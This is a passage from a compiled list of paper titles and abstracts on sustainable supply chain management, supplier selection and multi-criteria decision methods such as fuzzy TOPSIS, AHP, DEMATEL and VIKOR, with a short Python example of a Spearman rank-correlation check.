The findings could assist the managers of agro-food companies in Bosnia and Herzegovina to improve their business. This study provides guidance for improving business using supply chains. --- paper_title: A fuzzy multi criteria approach for measuring sustainability performance of a supplier based on triple bottom line approach paper_content: Abstract Sustainable supply chain management has received much attention from practitioners and scholars over the past decade owing to the significant attention given by consumers, profit and not-for-profit organizations, local communities, legislation and regulation to environmental, social and corporate responsibility. Sustainable supply chain initiatives like supplier environmental and social collaboration can play a significant role in achieving the “triple bottom line” of social, environmental, and economic benefits. Supplier selection plays an important role in the management of a supply chain. Traditionally, organizations consider criteria such as price, quality, flexibility, etc. when evaluating supplier performance. While the articles on the selection and evaluation of suppliers are abundant, those that consider sustainability issues are rather limited. This paper explores sustainable supply chain initiatives and examines the problem of identifying an effective model based on the Triple Bottom Line (TBL) approach (economic, environmental, and social aspects) for supplier selection operations in supply chains by presenting a fuzzy multi criteria approach. We use triangular fuzzy numbers to express linguistic values of experts' subjective preferences. Qualitative performance evaluation is performed by using fuzzy numbers for finding criteria weights and then fuzzy TOPSIS (Technique for Order Preference by Similarity to Ideal Solution) is proposed for finding the ranking of suppliers. The proposed approach is illustrated by an example. --- paper_title: Uncertain supply chain network design considering carbon footprint and social factors using two-stage approach paper_content: Sustainable development has become one of the leading global issues over the period of time. Currently, implementation of sustainability in supply chain has been continuously in center of attention due to introducing stringent legislations regarding environmental pollution by various governments and increasing stakeholders’ concerns toward social injustice. Unfortunately, literature is still scarce on studies considering all three dimensions (economical, environmental and social) of sustainability for the supply chain. An effective supply chain network design (SCND) is very important to implement sustainability in supply chain. This study proposes an uncertain SCND model that minimizes the total supply chain-oriented cost and determines the opening of plants, warehouses and flow of materials across the supply chain network by considering various carbon emissions and social factors. In this study, a new AHP and fuzzy TOPSIS-based methodology is proposed to transform qualitative social factors into quantitative social index, which is subsequently used in chance-constrained SCND model with an aim at reducing negative social impact. Further, the carbon emission of supply chain is estimated by considering a composite emission that consists of raw material, production, transportation and handling emissions. In the model, a carbon emission cap is imposed on total supply chain to reduce the carbon footprint of supply chain. 
To solve the proposed model, code is developed in the AMPL software using the nonlinear solver SNOPT. The applicability of the proposed model is illustrated with a numerical example. The sensitivity analysis examines the effects of reducing the carbon footprint cap, negative social impacts and varying probability on the total cost of the supply chain. It is observed that a stricter carbon cap over the supply chain network leads to the opening of more plants across the supply chain. In addition, the carbon footprint of the supply chain is found to decrease to a certain extent with the reduction in negative social impacts from suppliers. The carbon footprint of the supply chain is also found to be reduced with increasing certainty of material supply from the suppliers. The total supply chain cost is observed to increase with increasing probability. --- paper_title: Sustainable Supplier Management – A Review of Models Supporting Sustainable Supplier Selection, Monitoring and Development paper_content: In the last two decades, pressure from various stakeholders has forced many companies to establish environmental and social improvements both in their company and their supply chains. The growing number of journal publications and conference proceedings confirms this change also in academia. The aim of this paper is to analyse and review scientific literature on sustainable supplier management (SSM) with a focus on formal models supporting decision-making in sustainable supplier selection, monitoring and development. For this purpose, a framework on SSM is proposed and a comprehensive content analysis including a criteria analysis is carried out. Beyond this, in total 143 peer-reviewed publications between 1997 and 2014 have been analysed to identify both established and overlooked research fields. Major findings are the rapidly growing interest in this topic in academia in recent years, the predominance of Analytic Hierarchy Process, Analytic Network Process and fuzzy-based approaches, the focus on the f... --- paper_title: Developing a Green Supplier Selection Model by Using the DANP with VIKOR paper_content: This study proposes a novel hybrid multiple-criteria decision-making (MCDM) method to evaluate green suppliers in an electronics company. Seventeen criteria in two dimensions concerning environmental and management systems were identified under the Code of Conduct of the Electronic Industry Citizenship Coalition (EICC). Following this, the Decision-Making Trial and Evaluation Laboratory (DEMATEL)-based Analytic Network Process (ANP) method (known as DANP) was used to determine both the importance of evaluation criteria in selecting suppliers and the causal relationships between them. Finally, the VlseKriterijumska Optimizacija I Kompromisno Resenje (VIKOR) method was used to evaluate the environmental performances of suppliers and to obtain a solution under each evaluation criterion. An illustrative example of an electronics company was presented to demonstrate how to select green suppliers. --- paper_title: A decision support model for sustainable supplier selection in sustainable supply chain management paper_content: Selecting the most suitable sustainability criteria using a questionnaire. Applying various statistical tests to validate the developed criteria. Developing an integrated FPP-FTOPSIS model for sustainable supplier selection. Calculating weights using FPP and ranking suppliers using FTOPSIS. Explaining the model using the real case study based on the developed criteria.
This study is aimed at developing the most important and applicable criteria and their corresponding sub-criteria for sustainable supplier selection through a questionnaire-based survey. In addition, a hybrid model is proposed to identify the most sustainable supplier with respect to the determined attributes, using an Iranian textile manufacturing company as a case study. The first contribution of the research is developing a comprehensive list of sustainability criteria and sub-criteria, incorporating them into a questionnaire, and distributing the questionnaire to academics and practitioners to establish the importance and applicability of these criteria and sub-criteria. In order to demonstrate the robustness of the data obtained from the questionnaire, different established statistical tests (Cronbach's alpha and the Mann-Whitney U-test) were applied. The results show that the economic aspect is still the most essential, followed by the environmental aspect and finally the social aspect. The second contribution is the development of a new hybrid model by integrating fuzzy preference programming, one of the newest and most accurate fuzzy modifications of the Analytical Hierarchy Process, with the Fuzzy Technique for Order of Preference by Similarity to Ideal Solution. Fuzzy Preference Programming overcomes the shortcomings of previous methods for obtaining the weights, and the Fuzzy Technique for Order of Preference by Similarity to Ideal Solution prioritizes the suppliers and finds the best one under uncertainty. Generally, the developed list provides a basis that is helpful in improving suppliers' performance in terms of sustainability, which leads to improvement in sustainable supply chain management performance. In addition, the developed hybrid model can deal with inconsistency, uncertainty and calculation complexity. Generally, the framework (including the first and second objectives) can be applied by managers to evaluate and determine their appropriate suppliers in the presence of uncertainty. --- paper_title: Evaluating the performance of suppliers based on using the R'AMATEL-MAIRCA method for green supply chain implementation in electronics industry paper_content: Abstract Green supply chain management (GSCM) practitioners striving to create a healthier environment should first identify the key criteria pertinent to the process of implementing the appropriate sustainable policies, particularly in the most rapidly growing electronics sector. Since the decision to adopt GSCM in the electronics industry is associated with the use of a multi-dimensional approach involving a number of qualitative criteria, the paper examines GSCM based on fifteen criteria expressed in five dimensions and proposes a multi-criteria evaluation framework for selecting suitable green suppliers. In real life, the assessment of this decision is based on vague information or imprecise data of the expert's subjective judgements, including the feedback from the criteria and their interdependence. Thus, to treat this uncertainty in the multi-criteria decision making (MCDM) process, rough number (RN) is applied here, using only the internal knowledge in the operative data available to the decision-makers. In this way objective imprecisions and uncertainties are used and there is no need to rely on models of assumptions. Instead of different external parameters in the application of RN, the structure of the given data is used.
Therefore, the identified components are incorporated into a rough DEMATEL-ANP (R'AMATEL) method, combining the Decision Making Trial and Evaluation Laboratory Model (DEMATEL) and the Analytical Network Process (ANP) in a rough context. In group decision making, a rough number-based approach aggregates individual judgements and handles imprecision. The structure of the relationships between the criteria expressed in different dimensions is determined by using the rough DEMATEL (R'DAMETEL) method and building an influential network relation mapping, based on which the rough ANP (R'ANP) method is implemented to obtain the respective criteria weights. Then, the rough multi-attribute Ideal-Real Comparative Analysis (R'MAIRCA) is used to evaluate the environmental performance of suppliers for each evaluation criterion. Sensitivity analysis is performed to determine the impact of the weights of criteria and the influence of the decision maker's preferences on the final evaluation results. Applying the Spearman's rank correlation coefficient and other ranking methods, the stability of the alternative rankings based on the variation in the criteria weights is checked. The results obtained in the study show that the proposed method significantly increases the objectivity of supplier assessment in a subjective environment. --- paper_title: Framework for selecting sustainable supply chain processes and industries using an integrated approach paper_content: Abstract This study introduces a process view of sustainable supply chain management and identifies 17 sustainable supply chain processes (SSCPs) from literature. Further, a framework is proposed to identify the significance of various SSCPs on firm performance using the theoretical lenses of stakeholder theory and resource based view. Through a semi-structured interview of stakeholders, critical SSCPs across eight industries were identified in the Indian context. The study identifies five important SSCPs, such as sustainable design and development, strategic sourcing and efficient technology and sustainable product returns and recycling. Among the selected industries, pharmaceutical, agricultural and chemical industries were identified to be the front-runners in SSCPs practice. Subsequently, these five processes and three industries were evaluated using strategic decision making approach by integrating group decision making and fuzzy multi-criteria decision making methods. To handle the uncertainties of strategic decision making, six Fuzzy Multi-Criteria Decision Making methods have been applied and compared to understand their relevance while evaluating the above industries, based on the above identified SSCPs. This study introduces an approach to enhance sustainability of supply chain that can be extended across industries through a process view of supply chain, in emerging economies like India. --- paper_title: A Novel Rough WASPAS Approach for Supplier Selection in a Company Manufacturing PVC Carpentry Products paper_content: The decision-making process requires the prior definition and fulfillment of certain factors, especially when it comes to complex areas such as supply chain management. One of the most important items in the initial phase of the supply chain, which strongly influences its further flow, is to decide on the most favorable supplier. 
In this paper, a selection of suppliers in a company producing polyvinyl chloride (PVC) carpentry was made based on a new approach developed in the field of multi-criteria decision making (MCDM). The relative values of the weight coefficients of the criteria are calculated using the rough analytical hierarchical process (AHP) method. The evaluation and ranking of suppliers is carried out using the new rough weighted aggregated sum product assessment (WASPAS) method. In order to determine the stability of the model and the ability to apply the developed rough WASPAS approach, the paper analyzes its sensitivity, which involves changing the value of the coefficient λ in the first part. The second part of the sensitivity analysis relates to the application of different multi-criteria decision-making methods in combination with rough numbers that have been developed in the very recent past. The model presented in the paper is solved by using the following methods: rough Simple Additive Weighting (SAW), rough Evaluation based on Distance from Average Solution (EDAS), rough MultiAttributive Border Approximation area Comparison (MABAC), rough Visekriterijumsko kompromisno rangiranje (VIKOR), rough MultiAttributive Ideal-Real Comparative Analysis (MAIRCA) and rough Multi-objective optimization by ratio analysis plus the full multiplicative form (MULTIMOORA). In addition, in the third part of the sensitivity analysis, the Spearman correlation coefficient (SCC) of the ranks obtained was calculated, which confirms the applicability of all the proposed approaches. The proposed rough model allows the evaluation of alternatives despite the imprecision and lack of quantitative information in the information-management process. --- paper_title: Multi-Criteria Indicator for Sustainability Rating in Suppliers of the Oil and Gas Industries in Brazil paper_content: The necessity of sustainability evaluation is rapidly growing alongside the expansion of civilization. Likewise, the supply chain suitability improvement is a need that has arisen in the petroleum industry, especially as it is responsible for most of the CO2 emissions in the atmosphere. The modeling of this kind of problem deals with multiple criteria evaluations. This paper proposes an original multiple-criteria based approach to classifying the degree of organizational sustainability. This proposal was applied to evaluate a representative set of companies, which are suppliers of the Brazilian petroleum industry. The data collection was supported by a questionnaire. The results highlight that the studied companies have not yet reached an advanced level of maturity in the sustainability context. In a comprehensive vision of sustainability based on the Triple Bottom Line (TBL), these companies are either in the initial stage or in the implementation phase of the sustainability practices. --- paper_title: Selecting Green Supplier of Thermal Power Equipment by Using a Hybrid MCDM Method for Sustainability paper_content: With the growing worldwide awareness of environmental protection and sustainable development, green purchasing has become an important issue for companies to gain environmental and developmental sustainability. Thermal power is the main power generation form in China, and the green supplier selection is essential to the smooth and sustainable construction of thermal power plants.
Therefore, selecting the proper green supplier of thermal power equipment is very important to the company’s sustainable development and the sustainability of China’s electric power industry. In this paper, a hybrid fuzzy multi-attribute decision making approach (fuzzy entropy-TOPSIS) is proposed for selecting the best green supplier. The fuzzy set theory is applied to translate the linguistic preferences into triangular fuzzy numbers. The subjective criteria weights are determined by using decision makers’ superiority linguistic ratings and the objective ones are determined by combining the superiority linguistic ratings and fuzzy-entropy weighting method. The fuzzy TOPSIS is employed to generate an overall performance score for each green supplier. An empirical green supplier selection is conducted to illustrate the effectiveness of this proposed fuzzy entropy-TOPSIS approach. This proposed fuzzy entropy-TOPSIS approach can select the proper green supplier of thermal power equipment, which contributes to promoting the company’s sustainable development and the sustainability of China’s electric power industry to some extent. --- paper_title: A case analysis of a sustainable food supply chain distribution system—A multi-objective approach paper_content: Sustainable supply chain management is a topical area which is continuing to grow and evolve. Within supply chains, downstream distribution from producers to customers plays a significant role in the environmental performance of production supply chains. With consumer consciousness growing in the area of sustainable food supply, food distribution needs to embrace and adapt to improve its environmental performance, while still remaining economically competitive. With a particular focus on the dairy industry, a robust solution approach is presented for the design of a capacitated distribution network for a two-layer supply chain involved in the distribution of milk in Ireland. In particular the green multi-objective optimisation model minimises CO2 emissions from transportation and total costs in the distribution chain. These distribution channels are analysed to ensure the non-dominated solutions are distributed along the Pareto fronts. A multi-attribute decision-making approach, TOPSIS, has been used to rank the realistic feasible transportation routes resulting from the trade-offs between total costs and CO2 emissions. The refined realistic solution space allows the decision-makers to geographically locate the sustainable transportation routes. In addition to geographical mapping the decision maker is also presented with a number of alternative analysed scenarios which forcibly open closed distribution routes to build resiliency into the solution approach. In terms of model performance, three separate GA based optimisers have been evaluated and reported upon. In the case presented NSGA-II was found to outperform its counterparts of MOGA-II and HYBRID. --- paper_title: Improving sustainable supply chain management using a novel hierarchical grey-DEMATEL approach paper_content: Abstract Sustainable supply chain management has been studied in the past. However, the previous studies lack proper justification for a multi-criteria decision-making structure of the hierarchical interrelationships in incomplete information. To fill this gap, this study proposes a hierarchical grey decision-making trial and evaluation laboratory method to identify and analyze criteria and alternatives in incomplete information. 
Traditionally, the decision-making trial and evaluation laboratory method does not address a hierarchical structure and involves incomplete information within its analytical method. However, the grey theory compensates for incomplete information. This study's purpose is to apply the proposed hierarchical structure to identify aspects of and criteria for supplier prioritization. This includes an original set of criteria for structuring the following: aspects as a sustainable plan, communities for sustainability, sustainable operational process control and sustainable certification and growth. The results present the recycle/reuse/reduce option as a tool to increase the material savings percentage, which is the top criterion for supplier selection. This study concluded that the hierarchical analytical method provides a strong basis for future academic and practitioner research. --- paper_title: A multi-objective model for multi-product multi-site aggregate production planning in a green supply chain: Considering collection and recycling centers paper_content: Abstract The present study was designed to incorporate the profit and green principles in an aggregate production planning. It is difficult to ignore the key role of green principles in balancing environmental and economic performance for companies facing community, and competitive pressures. In this paper, a multi-objective multi-period multi-product multi-site aggregate production planning (APP) model is presented in a green supply chain considering a reverse logistic (RL) network. In the proposed model, products are scored in terms of environmental criteria such as recyclability, biodegradability, energy consumption and product risk, using analytical hierarchy process (AHP). Speaking in simple terms, the AHP concept is utilized to get one single indicator that describes environmental impact of various production alternatives. Some other green indicators including waste management, greenhouse gas (GHG) emissions arising from production methods and transportation are embedded in the model. The limited number of potential collection and recycling centers can be opened in order to produce the second-class goods. The LP-metrics method is used to consider two conflicting objectives, i.e. minimizing total losses and maximizing total environmental scores of products, simultaneously. Further, the trade-off between objectives is demonstrated by a collection of Pareto-optimal solutions. The model shows how profit and green principles can be incorporated in an APP problem. Finally, the model validity is demonstrated by a numerical example. The sensitivity analysis is carried out for GHG emission level arising from production and transportation and industrial waste level to provide some useful managerial insights, then analysis of the cost and profit in collection and recycling system, is conducted to show its performance. --- paper_title: Evaluating the Drivers to Information and Communication Technology for Effective Sustainability Initiatives in Supply Chains paper_content: Supply chain (SC) sustainability has become a global issue. To develop sustainability focused SC networks, the role of Information and Communication Technologies (ICTs) is of great significance. 
An effective information system and its management can help not only in improving customer service and controlling costs, but can also assist planning to achieve the three pillars of sustainability (ecological, economic, and societal development), thereby enhancing business efficiency. This paper aims to identify and evaluate the drivers relevant to ICT for sustainability initiatives in SCs. The drivers are finalized through a literature survey and use of the Delphi technique. The finalized drivers are analyzed by a procedure using the fuzzy DEMATEL approach. The research findings suggest that the “Government support systems and subsidies”, “Knowledge and awareness of ICT tools and techniques,” and “Information systems network design” drivers have the most significant influences in the implementation of ICT for incorporating sustainability in SCs. This work may help practitioners and researchers in strategic decision-making and in formulating effective plans for the implementation of ICT and for incorporating sustainable concepts in SCs. --- paper_title: A review of modeling approaches for sustainable supply chain management paper_content: More than 300 papers have been published in the last 15 years on the topic of green or sustainable (forward) supply chains. Looking at the research methodologies employed, only 36 papers apply quantitative models. This is in contrast to, for example, the neighboring field of reverse or closed-loop supply chains, where several reviews on respective quantitative models have already been provided. The paper summarizes research on quantitative models for forward supply chains and thereby contributes to the further substantiation of the field. While different kinds of models are applied, it is evident that the social side of sustainability is not taken into account. On the environmental side, life-cycle assessment based approaches and impact criteria clearly dominate. On the modeling side there are three dominant approaches: equilibrium models, multi-criteria decision making and analytical hierarchy process. There has been only limited empirical research so far. The paper ends with suggestions for future research. --- paper_title: A new fuzzy multi-criteria framework for measuring sustainability performance of a supply chain paper_content: Sustainable supply chain performance measurement is aimed at addressing environmental, social and economic aspects of sustainable supply chain management. It can be argued that it is not easy to reduce all dimensions of a sustainable supply chain to a single unit. Then, the issue is that all valuations should somehow be reducible to a single one-dimensional standard. Multi-criteria evaluation introduces a framework to remedy this issue. As a consequence, multi-criteria evaluation seems to supply a proper and adequate assessment framework for sustainable supply chain assessment. In this study, a multi-criteria framework based on fuzzy entropy and fuzzy multi-attribute utility (FMAUT) is proposed in order to evaluate and compare company performances in terms of the sustainable supply chain. However, note that reducing all aspects of a sustainable supply chain to a single unit using a multi-criteria framework may not be sufficient to satisfy all the needs of decision makers, although it is used to evaluate sustainability performance of supply chains with respect to three aspects. Therefore, in this research, an alert management system is also developed to satisfy further requirements of users.
The proposed frameworks are tested using data obtained from one of the mid-sized Turkish grocery retailers. --- paper_title: A supplier selection life cycle approach integrating traditional and environmental criteria using the best worst method paper_content: Abstract Supplier selection is a strategic decision that significantly influences a firm's competitive advantage. The importance of this decision is amplified when a firm seeks new markets and potentially a new supplier base. Recognizing the importance of these decisions, an innovative three-phase supplier selection methodology including pre-selection, selection, and aggregation is proposed. Conjunctive screening is used for pre-selection, and the best worst method (BWM), a novel multiple criteria decision-making method, is introduced for the selection phase. Material price and annual quantity are integrated with the decision at the aggregation phase. Qualitative, quantitative, traditional business, and environmental criteria are incorporated. The proposed methodology is applied within a food supply chain context, the edible oils industry. In this illustration, the focal organization faces a global entry decision in a new international market. An extensive search is completed to identify the potential suppliers. Through initial screening, a sub-set of qualified suppliers is identified. BWM is then used to find the best suppliers from among the qualified suppliers. Eventually, the significance of the supplies in the aggregation phase is determined. The outcome is a relatively meaningful ranking of suppliers. The paper provides insights into the methodology, decision, and managerial implications. Study and model limitations, along with future research directions, are described. --- paper_title: Novel Integrated Multi-Criteria Model for Supplier Selection: Case Study Construction Company paper_content: The supply chain presents a very complex field involving a large number of participants. The aim of the complete supply chain is finding an optimum from the aspect of all participants, which is a rather complex task. In order to ensure optimum satisfaction for all participants, it is necessary that the beginning phase consists of correct evaluations and supplier selection. In this study, supplier selection was performed in a construction company on the basis of a new approach in the field of multi-criteria modelling. Weight coefficients were obtained by the DEMATEL (Decision Making Trial and Evaluation Laboratory) method, based on rough numbers. Evaluation and supplier selection were made on the basis of a new Rough EDAS (Evaluation based on Distance from Average Solution) method, which represents one of the latest methods in this field. In order to determine the stability of the model and the applicability of the proposed Rough EDAS method, an extension of the COPRAS and MULTIMOORA methods by rough numbers was also performed in this study, and the findings of the comparative analysis were presented. Besides the new approaches based on the extension by rough numbers, the results are also compared with the Rough MABAC (MultiAttributive Border Approximation area Comparison) and Rough MAIRCA (MultiAttributive Ideal-Real Comparative Analysis). In addition, in the sensitivity analysis, 18 different scenarios were formed in which the criteria change their original values. At the end of the sensitivity analysis, the SCC (Spearman Correlation Coefficient) of the obtained ranks was calculated, confirming the applicability of the proposed approaches.
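Several of the entries above (the rough WASPAS and rough EDAS studies in particular) close their sensitivity analyses by comparing the ranks produced by different MCDM variants with the Spearman correlation coefficient. As a minimal, self-contained sketch of that check, the Python snippet below uses purely hypothetical ranks for five suppliers; the data and variable names are illustrative and are not taken from any of the cited papers.

```python
def spearman_rho(rank_a, rank_b):
    """Spearman rank correlation for two rankings of the same alternatives (no ties)."""
    n = len(rank_a)
    d_squared = sum((a - b) ** 2 for a, b in zip(rank_a, rank_b))
    return 1.0 - 6.0 * d_squared / (n * (n ** 2 - 1))

# Hypothetical ranks of five suppliers (1 = best) produced by two different MCDM methods.
ranks_method_1 = [1, 2, 3, 4, 5]
ranks_method_2 = [1, 3, 2, 4, 5]
print(spearman_rho(ranks_method_1, ranks_method_2))  # 0.9 -> the two rankings largely agree
```

Values close to 1 indicate that two methods order the alternatives almost identically, which is how the cited studies argue for the stability of their proposed rankings.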
--- paper_title: Low Carbon Supplier Selection in the Hotel Industry paper_content: This study presents a model for evaluating the carbon and energy management performance of suppliers by using multiple-criteria decision-making (MCDM). By conducting a literature review and gathering expert opinions, 10 criteria on carbon and energy performance were identified to evaluate low carbon suppliers using the Fuzzy Delphi Method (FDM). Subsequently, the decision-making trial and evaluation laboratory (DEMATEL) method was used to determine the importance of evaluation criteria in selecting suppliers and the causal relationships between them. The DEMATEL-based analytic network process (DANP) and VlseKriterijumska Optimizacija I Kompromisno Resenje (VIKOR) were adopted to evaluate the weights and performances of suppliers and to obtain a solution under each evaluation criterion. An illustrative example of a hotel company was presented to demonstrate how to select a low carbon supplier according to carbon and energy management. The proposed hybrid model can help firms become effective in facilitating low carbon supply chains in hotels. --- paper_title: An integrated framework for sustainable supplier selection and evaluation in supply chains paper_content: Due to increased customer knowledge and ecological pressures from markets and various stakeholders, business organizations have emphasized the importance of greening and sustainability in their supply chain through supplier selection. Therefore, a systematic and sustainability-focused evaluation system for supplier selection is needed from an organizational supply chain perspective. This work proposes a framework to evaluate sustainable supplier selection by using an integrated Analytical Hierarchy Process (AHP), ViseKriterijumska Optimizacija I Kompromisno Resenje (VIKOR), a multi-criteria optimization and compromise solution approach. Initially, 22 sustainable supplier selection criteria and three dimensions of criteria (economic, environmental, and social) have been identified through literature and experts' opinions. A real world example of an automobile company in India is discussed to demonstrate the proposed framework applicability. According to the findings, ‘Environmental costs,’ ‘Quality of product,’ ‘Price of product,’ ‘Occupational health and safety systems,’ and ‘Environmental competencies’ have been ranked as the top five sustainable supplier selection criteria. In addition, out of the five sustainable supplier's alternatives, supplier number ‘three’ got the highest rank. The work presented in this paper may help managers and business professionals not only to distinguish the important supplier selection criteria but also to evaluate the most efficient supplier for sustainability in supply chain, while remaining competitive in the market. Sensitivity analysis is also conducted to test the proposed framework robustness. --- paper_title: Operations and inspection Cost minimization for a reverse supply chain paper_content: Reverse supply chain is a process dealing with the backward flows of used/damaged products or materials. Reverse supply chain includes activities such as collection, inspection, reprocess, disposal and redistribution. A well-organized reverse supply chain can provide important advantages such as economic and environmental ones. 
In this study, we propose a configuration in which quality assurance is a substantial operation to be fulfilled in the reverse chain so as to minimize the total costs of the reverse supply chain. A mathematical model is formulated for product return in a reverse supply chain considering quality assurance. We consider a multilayer, multi-product setting for the model. Control charts with exponentially weighted moving average (EWMA) statistics (mean and variance) are used to jointly monitor the mean and variance of a process. An EWMA cost minimization model is presented to design the joint control scheme based on performance criteria. The main objective of the paper is minimizing the total costs of the reverse supply chain with respect to inspection. --- paper_title: Sustainable supplier selection and order lot-sizing: An integrated multi-objective decision-making process paper_content: Within supply chain activities, selecting appropriate suppliers based on the sustainability criteria (economic, environmental and social) can help companies move toward sustainable development. Although several studies have recently been accomplished to incorporate sustainability criteria into the supplier selection problem, much less attention has been devoted to developing a comprehensive mathematical model that allocates the optimal quantities of orders to suppliers considering lot-sizing problems. In this research, we propose an integrated approach of rule-based weighted fuzzy method, fuzzy analytical hierarchy process and multi-objective mathematical programming for sustainable supplier selection and order allocation combined with a multi-period multi-product lot-sizing problem. The mathematical programming model consists of four objective functions, which are minimising total cost, maximising total social score, maximising total environmental score and maximising total economic qualitative score. The prop... --- paper_title: A four-phase AHP–QFD approach for supplier assessment: a sustainability perspective paper_content: Recently, companies have become increasingly aware of the need to evaluate suppliers from a sustainability perspective. Introducing the triple bottom line (economic, social, and environmental performance) into supplier assessment and selection decisions embeds a new set of trade-offs, complicating the decision-making process. Although many tools have been developed to help purchasing managers make more effective decisions, decision support tools and methodologies which integrate sustainability (triple bottom line) into supplier assessment and selection are still sparse in the literature. Moreover, most approaches have not taken into consideration the impact of business objectives and requirements of company stakeholders on the supplier evaluation criteria. To help advance this area of research and further integrate sustainability into the supplier selection modelling area, we develop an integrated analytical approach, combining Analytical Hierarchy Process (AHP) with Quality Function Deployment (QFD), to... --- paper_title: Sustainable third-party reverse logistic provider selection with fuzzy SWARA and fuzzy MOORA in plastic industry paper_content: Third-party logistic provider (3PLP) companies play a major role in supply chain management (SCM) by carrying out specialized functions—namely, integrated operation, warehousing, and transportation services. Taking sustainability issues into consideration makes reverse logistics even more significant.
In this paper, a combination of sustainability and risk factors was considered for third-party reverse logistic provider (3PRLP) evaluation. Initially, fuzzy step-wise weight assessment ratio analysis (Fuzzy SWARA) was applied for weighing the evaluation criteria; then, Fuzzy multi-objective optimization on the basis of ratio analysis (Fuzzy MOORA) was utilized for ranking the sustainable third-party reverse logistic providers in the plastic industry in the second step. Findings highlight that quality, recycling, health, and safety were the most important criteria in economic, environmental, and social dimensions of sustainability, respectively. Also, operational risk was found to have the highest weight among risk factors. --- paper_title: Using AHP and Dempster-Shafer theory for evaluating sustainable transport solutions paper_content: In this paper, we present a hybrid approach based on the Analytical Hierarchy Process (AHP) and Dempster-Shafer theory for evaluating the impact of environment-friendly transport measures like mode sharing, multi-modal transport solutions, intelligent transport solutions, etc. on city sustainability. The proposed approach is a mix of curiosity driven and client-driven research in the sense that the problem is guided by the client for practical applicability and the solution is motivated by technical or scientific contribution to research. The solution approach comprises multiple steps. In the first step, we identify the criteria for sustainability evaluation. AHP is used to structure and rate the criteria. In the second step, we test the transportation measure for sustainability and collect data from multiple information sources like human experts, questionnaire, sensors, models, etc on the selected criteria for evaluation purposes. The information from multiple data sources is combined using Dempster-Shafer theory. In the third step, we estimate the state of sustainability of the city using a Transport Sustainability Index (TSI). The Transport Sustainability Index is computed at two stages: pre- and post-test stages of the transportation measure. In the fourth step, we assess the impacts of the transportation measure on the city sustainability by observing the difference between the values at the pre- and the post-test stages. If an increase in the value of TSI is observed, then the impact of the transportation measure on city sustainability is judged as positive and it is recommended for adoption. We illustrate our approach by application on the transportation measure ''Carsharing''. --- paper_title: A hybrid approach integrating Affinity Diagram, AHP and fuzzy TOPSIS for sustainable city logistics planning paper_content: Abstract City logistics initiatives are steps taken by municipal administrations to ameliorate the condition of goods transport in cities and reduce their negative impacts on city residents and their environment. Examples of city logistics initiatives are urban distribution centers, congestion pricing, delivery timing and access restrictions. In this paper, we present a hybrid approach based on Affinity Diagram, AHP and fuzzy TOPSIS for evaluating city logistics initiatives. Four initiatives namely vehicle sizing restrictions, congestion charging schemes, urban distribution center and access timing restrictions are considered. The proposed approach consists of four steps. The first step involves identification of criteria for assessing performance of city logistics initiatives using Affinity Diagram. 
The results are four categories of criteria, namely technical, social, economic and environmental. In step 2, a decision-making committee comprising representatives of city logistics stakeholders is formed. These stakeholders are shippers, receivers, transport operators, end consumers and public administrators. The committee members weight the selected criteria using AHP. In step 3, the decision makers provide linguistic ratings to the alternatives (city logistics initiatives) to assess their performance against the selected criteria. These linguistic ratings are then aggregated using fuzzy TOPSIS to generate an overall performance score for each alternative. The alternative with the highest score is finally chosen as the most suitable city logistics initiative for improving city sustainability. In the fourth step, we perform sensitivity analysis to evaluate the influence of criteria weights on the selection of the best alternative. The proposed approach is novel and can be practically applied for selecting sustainable city logistics initiatives for cities. Another advantage is its ability to generate solutions under limited quantitative information. An empirical application of the proposed approach is provided. --- paper_title: Multiple criteria decision-making techniques in transportation systems: a systematic review of the state of the art literature paper_content: Abstract The main goal of this review paper is to provide a systematic review of Multiple Criteria Decision-Making (MCDM) techniques in regard to transportation systems problems. This study reviewed a total of 89 papers, published from 1993 to 2015, from 39 high-ranking journals; most of which were related to transportation science and were extracted from the Web of Science and Scopus databases. Papers were classified into 10 main application areas and nine transport infrastructures. Furthermore, papers were categorized based on the author(s) and year, name of the journal in which they were published, technique and approach, author(s) nationality, application area and scope, study purpose, gap and research problem and results and outcome. The results of this study indicated that more papers on MCDM were published in 2013 than in any other year. AHP and Fuzzy-AHP methods among the individual methods, and hybrid MCDM and fuzzy MCDM among the integrated methods, were ranked as the first and second methods in use, respectively. The T... --- paper_title: One solution for cross-country transport-sustainability evaluation using a modified ELECTRE method paper_content: Transport is an economic activity having complex interactions with the environment, and since the concept of sustainable development was identified as a global priority, there has been a growing interest in assessing the performance of transport systems with respect to sustainability issues. Although the Ecological Economics literature deals extensively with the strategy of sustainable development, far less attention has been paid to its application in the transport sector as of yet. The main purpose of this study was to introduce a noncompensatory analytical tool which integrates the multidimensional conditions present in the sustainability concept. The focus was on the potential of the outranking approach, namely the ELECTRE (ELimination Et Choix Traduisant la REalite; Elimination And Choice Corresponding to Reality) method, for the evaluation of transport sustainability at the macro level, using the indicator set as a starting point.
The method has been applied to selected European countries within a case study. As a result, according to transport-sustainability issues, pairwise relations between countries have been established. Based on these relations, and according to the chosen criteria, a set of countries with a better level of performance was selected as the core subset of the relation graph. To control and avoid the appearance of indifference relations between countries, as well as to reduce the subjectivity of decision makers, we propose a modification of ELECTRE I. Finally, we apply both the original and the modified methods, together with the sensitivity analysis. The results are presented in a convenient graph form and then compared. --- paper_title: Intermodal Transport Terminal Location Selection Using a Novel Hybrid MCDM Model paper_content: Intermodal Transport (IT) allows savings in energy, time and costs, improves the quality of services and supports sustainable development of the transport system. In order to make IT more competitive it is necessary to support the development of intermodal transport terminal (ITT), whereby it is very important to make adequate decision on its location. This paper proposes a framework for the selection of the ITT location which would be most appropriate for the various stakeholders (investors, users, administration and residents). They often have conflicting goals and interests, so it is necessary to define a large number of criteria for the evaluation. A novel hybrid MCDM model that combines fuzzy Delphi, fuzzy Delphi based fuzzy ANP (fuzzy DANP) and fuzzy Delphi based fuzzy Visekriterijumska Optimizacija i kompromisno Resenje (fuzzy DVIKOR) methods is developed in this paper with the aim of providing support to decision makers. The model is developed in the fuzzy environment in order to overcome the ambiguity and uncertainty of the decision makers’ evaluations of the criteria, sub-criteria and alternatives. The validity and applicability of the model is demonstrated by successfully resolving the problem of selecting the location of the ITT in the City of Belgrade. --- paper_title: Evaluating Plan Alternatives for Transportation System Sustainability: Atlanta Metropolitan Region paper_content: A growing number of agencies have begun to define ‘‘sustainability’’ for transportation systems and are attempting to incorporate the concept into the regional transportation planning process. Still, very few metropolitan planning organizations (MPOs) capture the comprehensive impact of transportation system and land use changes on the economy, environment, and social quality of life, which are commonly considered the essential three dimensions of sustainable transportation systems. This paper demonstrates an application of the Multiple Criteria Decision Making (MCDM) approach for evaluating selected transportation and land use plans in the Atlanta region using multiple 